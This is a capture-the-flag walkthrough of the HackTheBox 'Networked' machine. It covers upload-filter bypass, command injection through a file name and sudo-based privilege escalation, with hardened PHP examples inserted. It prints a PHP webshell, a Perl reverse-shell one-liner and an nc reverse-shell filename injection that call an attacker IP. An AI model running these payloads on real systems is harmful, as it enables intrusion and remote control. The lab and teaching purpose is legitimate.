Hello everyone. Today's CTF challenge box is "Networked" from hackthebox. hackthebox is a very good online lab platform that helps you improve your penetration-testing and black-box testing skills; it has a large number of boxes, from easy to hard, at every level.
This box is rated Hard; the task is to find user.txt and root.txt on the target.
# Information enumeration
Using masscan to probe for open ports, we found ports 22 and 80.
Nmap was then used to enumerate the services on 22 and 80.
# Exploitation
We start with the web service on port 80. Fuzzing web paths turned up a few interesting entries:

```
=====================================================================
ID           Response   Lines    Word     Chars       Payload
=====================================================================
000000088:   301        7 L      20 W     235 Ch      "backup"
000000862:   301        7 L      20 W     236 Ch      "uploads"
```
Visiting the URLs, backup turns out to be a compressed backup of the whole web site; after downloading it we find upload.php and photos.php.
We look at upload.php first:

```php
<?php
require '/var/www/html/lib.php';

define("UPLOAD_DIR", "/var/www/html/uploads/");

if( isset($_POST['submit']) ) {
  if (!empty($_FILES["myFile"])) {
    $myFile = $_FILES["myFile"];

    if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
      echo '<pre>Invalid image file.</pre>';
      displayform();
    }

    if ($myFile["error"] !== UPLOAD_ERR_OK) {
      echo "<p>An error occurred.</p>";
      displayform();
      exit;
    }

    //$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];
    list ($foo,$ext) = getnameUpload($myFile["name"]);
    $validext = array('.jpg', '.png', '.gif', '.jpeg');
    $valid = false;
    foreach ($validext as $vext) {
      if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
        $valid = true;
      }
    }

    if (!($valid)) {
      echo "<p>Invalid image file</p>";
      displayform();
      exit;
```

upload.php lets us upload a shell: it only checks the filename suffix and the file type. We can upload an image shell with the extension .php.png and put an image header at the start of the content so that it passes the file-type check. In photos.php we find that we can reach the uploaded image, except that its name is rewritten to the form ip.php.png:

```php
if ((strpos($exploded[0], '10_10_') === 0) && (!($prefix === $_SERVER["REMOTE_ADDR"])) ) {
  continue;
}
```
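As an added example (not code from the box or from this writeup), this is what a hardened upload handler for the same form looks like: the client-supplied name is never used, the image is decoded and re-encoded so only pixel data is stored, and the name is chosen by the server. It assumes the GD extension is available and keeps the page's UPLOAD_DIR path.

```php
<?php
// Added example (not the box's upload.php): a hardened replacement for the
// check shown above. The original accepts any name that merely *ends* with
// .jpg/.png/.gif/.jpeg, so "shell.php.png" passes, and it trusts a magic
// header, so "GIF8;<?php ..." passes the type check too.
// Assumes the GD extension is installed; UPLOAD_DIR is the path from the page.
define('UPLOAD_DIR', '/var/www/html/uploads/');
const MAX_BYTES = 60000;

/**
 * Store an uploaded image safely. Returns the new file name or null on rejection.
 * The file is decoded from its bytes, re-encoded as PNG (which discards anything
 * that is not pixel data) and written under a random, server-chosen name.
 */
function store_image(array $file): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    if (filesize($file['tmp_name']) > MAX_BYTES) {
        return null;
    }
    // A fake header followed by PHP code is not a decodable image, so
    // imagecreatefromstring() returns false and the upload is rejected.
    $img = @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        return null;
    }
    // Name and extension come from the server, never from the client name or
    // the remote address, so there is no double extension to exploit.
    $name = bin2hex(random_bytes(16)) . '.png';
    $ok = imagepng($img, UPLOAD_DIR . $name);
    imagedestroy($img);
    return $ok ? $name : null;
}

// Defence in depth for the directory itself (assumed Apache/mod_php layout):
// even if a PHP file ever lands in uploads/, it must not be executed.
//   <Directory /var/www/html/uploads>
//       php_admin_flag engine off
//       RemoveHandler .php .phtml .phar
//   </Directory>

if (isset($_POST['submit']) && !empty($_FILES['myFile'])) {
    $stored = store_image($_FILES['myFile']);
    echo $stored === null ? '<pre>Invalid image file.</pre>'
                          : '<pre>Stored as ' . htmlspecialchars($stored) . '</pre>';
}
```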
The content of our webshell is:

```
GIF8; <?php system($_GET['cmd']); ?>
```

The upload succeeded.
# Low-privilege shell
We use perl through the webshell to connect back to our listener:

```perl
perl -e 'use Socket;$i="10.10.14.72";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

Then we upgrade to a proper TTY:

```
root@localhost:~/hackthebox_workspace/Networked_146# nc -lvp 4444
listening on [any] 4444 ...
10.10.10.146: inverse host lookup failed: Unknown host
connect to [10.10.14.72] from (UNKNOWN) [10.10.10.146] 49656
sh: no job control in this shell
sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ ^Z
[1]+  已停止               nc -lvp 4444
root@localhost:~/hackthebox_workspace/Networked_146# stty raw -echo
root@localhost:~/hackthebox_workspace/Networked_146# nc -lvp 4444
reset
reset: unknown terminal type unnown
Terminal type? xterm
bash-4.2$ export SHELL=bash
bash-4.2$ export TERM=xterm-256color
bash-4.2$ stty rows 36 columns 144
```
Once connected, we find that we do not have permission to read user.txt, which lives in guly's home directory. Inside that directory we find check_attack.php:

```php
<?php
require '/var/www/html/lib.php';

$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";
$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
  $msg='';
  if ($value == 'index.html') {
    continue;
  }
  #echo "-------------\n";
  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}
?>
```

check_attack.php looks for files that should not be in the uploads directory and deletes them, but the file name is concatenated into the rm command without any filtering, which gives us command injection:

```php
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
$path = '/var/www/html/uploads/';
```
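An added example, not the box's script: the same cleanup job written without a shell, so a file name can only ever be a file name. is_expected_name() is an assumed stand-in for lib.php's check_ip()/getnameCheck(), which the page does not show, and the demo directory at the end is constructed.

```php
<?php
// Added example (not the box's check_attack.php). The page's version runs
//   exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
// with $value taken straight from scandir(), so a file *name* becomes part of a
// shell command line. unlink() takes a path, not a command, so nothing is parsed.

// Assumed naming rule: uploads are <ip with underscores>.<image extension>
// (the page shows names starting with "10_10_"); anything else is unexpected.
function is_expected_name(string $name): bool
{
    return preg_match('/^\d{1,3}(?:_\d{1,3}){3}\.(?:jpg|jpeg|png|gif)$/i', $name) === 1;
}

/** Delete every file in $path that does not match the naming rule; return the names removed. */
function remove_unexpected_uploads(string $path, string $logpath): array
{
    $removed = [];
    foreach (scandir($path) as $value) {
        if ($value === '.' || $value === '..' || $value === 'index.html') {
            continue;
        }
        if (is_expected_name($value)) {
            continue;
        }
        $full = $path . DIRECTORY_SEPARATOR . $value;
        if (is_file($full) && unlink($full)) {
            $removed[] = $value;
            // The name is written as data only. If a shell were truly unavoidable,
            // the argument would have to go through escapeshellarg(); the same
            // applies to mail()'s fifth argument, which the page's script builds
            // as "-F$value" and which is handed to the sendmail binary.
            file_put_contents($logpath, "removed: $value\n", FILE_APPEND | LOCK_EX);
        }
    }
    return $removed;
}

// Self-contained demo on a constructed temporary directory.
$dir = sys_get_temp_dir() . '/uploads_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
touch("$dir/10_10_14_72.png");        // legitimate upload: kept
touch("$dir/x; echo injected");       // hostile name: removed, nothing executed
touch("$dir/10_10_14_72.php.png");    // double extension: removed
$removed = remove_unexpected_uploads($dir, "$dir.log");
sort($removed);
echo implode("\n", $removed), "\n";
```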
We go back to the uploads/ directory and create a file whose name carries the injection:

```
touch '; nc 10.10.14.72 1234 -c bash'
```

After quite a while, the nc listener on port 1234 finally received a connection. The first thing to do with a new nc shell is to make it stable:

```
root@localhost:~/hackthebox_workspace/Networked_146# nc -lvp 1234
listening on [any] 1234 ...
10.10.10.146: inverse host lookup failed: Unknown host
connect to [10.10.14.72] from (UNKNOWN) [10.10.10.146] 46548
ls
check_attack.php
crontab.guly
lse.sh
shell2
user.txt
python -c 'import pty;pty.spawn("/bin/bash")'
[guly@networked ~]$ ^Z
[1]+  已停止               nc -lvp 1234
root@localhost:~/hackthebox_workspace/Networked_146# fg
nc -lvp 1234
^Z
[1]+  已停止               nc -lvp 1234
root@localhost:~/hackthebox_workspace/Networked_146# stty raw -echo
root@localhost:~/hackthebox_workspace/Networked_146# nc -lvp 1234
reset
reset: unknown terminal type unknown
Terminal type? xterm
[guly@networked ~]$ export SHELL=bash
[guly@networked ~]$ export TERM=xterm-256color
[guly@networked ~]$ stty rows 36 columns 144
[guly@networked ~]$ cat user.txt
526cfc2305f17faaa***************
```

We have user.txt.
# Privilege escalation
Running sudo -l, we find that guly can run /usr/local/sbin/changename.sh as root without a password:

```
[guly@networked ~]$ sudo -l
Matching Defaults entries for guly on networked:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
    (root) NOPASSWD: /usr/local/sbin/changename.sh
```

Looking at /usr/local/sbin/changename.sh:

```bash
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
    echo "interface $var:"
    read x
    while [[ ! $x =~ $regexp ]]; do
        echo "wrong input, try again"
        echo "interface $var:"
        read x
    done
    echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

/sbin/ifup guly0
```

changename.sh is just a network script that creates an interface and brings it up for guly; it prompts the user for these options: NAME, PROXY_METHOD, BROWSER_ONLY and BOOTPROTO.
https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f
Based on the URL above, we can inject a command through the NAME option:

```
[guly@networked network-scripts]$ sudo /usr/local/sbin/changename.sh
interface NAME:
test bash
interface PROXY_METHOD:
test
interface BROWSER_ONLY:
test
interface BOOTPROTO:
test
[root@networked network-scripts]# id
uid=0(root) gid=0(root) groups=0(root)
[root@networked ~]# cat root.txt
0a8ecda83f1d81251***************
```

And finally we have root.txt.